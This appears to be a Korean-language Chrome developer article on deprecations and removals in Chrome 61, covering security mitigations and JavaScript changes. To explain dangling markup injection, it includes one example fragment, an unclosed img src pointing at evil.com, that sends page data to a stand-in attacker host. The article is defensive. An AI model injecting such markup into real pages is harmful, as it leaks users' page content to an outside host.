거의 모든 버전의 Chrome에서 제품, 성능, 웹 플랫폼 기능에 대한 상당한 수의 업데이트와 개선사항이 적용됩니다. 이 도움말에서는 8월 3일 현재 베타 버전인 Chrome 61의 지원 중단 및 삭제에 관해 설명합니다. 이 목록은 언제든지 변경될 수 있습니다.
보안 및 개인정보 보호
URL에 '\n' 및 '<' 문자가 포함된 리소스 차단
잘린 URL을 사용하여 외부 엔드포인트로 데이터를 전송하는 댕글링 마크업 삽입이라는 해킹 유형이 있습니다. 예를 들어 <img src='https://evil.com/?가 포함된 페이지를 생각해 보세요. URL에 닫는 따옴표가 없으므로 브라우저는 다음에 오는 따옴표까지 읽고 묶인 문자를 단일 URL인 것처럼 처리합니다.
Chrome 61에서는 href 및 src 속성에 허용되는 문자 집합을 제한하여 이 취약점을 완화합니다. 특히 Chrome은 줄바꿈 문자 (\n)와 미만 문자 (<)를 발견하면 URL 처리를 중지합니다.
URL에서 줄바꿈 및 기호를 사용하는 합법적인 사용 사례가 있는 개발자는 대신 이러한 문자를 이스케이프해야 합니다.
삭제 의도 | Chromestatus 추적기 | Chromium 버그
안전하지 않은 컨텍스트에서 Presentation API 지원 중단 및 삭제
안전하지 않은 출처에서 Presentation API가 해킹 벡터로 사용될 수 있는 것으로 확인되었습니다. 디스플레이에는 주소 표시줄이 없으므로 API를 사용하여 콘텐츠를 스푸핑할 수 있습니다. 실행 중인 프레젠테이션에서 데이터를 유출할 수도 있습니다.
Blink의 안전하지 않은 출처에서 강력한 기능을 삭제하겠다는 의도에 따라 안전하지 않은 컨텍스트에서 Presentation API 지원을 지원 중단하고 삭제할 계획입니다. Chrome 61부터 PresentationRequest.start()는 안전하지 않은 출처에서 더 이상 작동하지 않습니다.
삭제 의도 | Chromestatus 추적기 | Chromium 버그
자바스크립트
창에서 색인이 생성된 속성 정의 허용 안함
이전에는 일부 브라우저에서 다음과 같은 JavaScript 할당을 허용했습니다.
window[0] = 1;
현재 HTML 사양에서는 이 기능이 JavaScript 사양을 명시적으로 위반한다고 설명합니다. 따라서 이 기능은 Chrome 61에서 삭제되었습니다. 2016년 2월부터 Firefox는 이미 정책을 준수하고 있습니다.
안전하지 않은 iframe에서 알림 사용 삭제
iframe의 권한 요청은 포함 페이지의 출처와 요청을 실행하는 iframe의 출처를 구분하기 어렵기 때문에 사용자를 혼동시킬 수 있습니다. 요청 범위가 명확하지 않으면 사용자가 권한을 부여할지 거부할지 판단하기 어렵습니다.
iframe에서 알림을 허용하지 않으면 알림 권한 요구사항이 푸시 알림의 요구사항과 일치하여 개발자의 불편을 줄일 수 있습니다.
이 기능이 필요한 개발자는 새 창을 열어 알림 권한을 요청할 수 있습니다.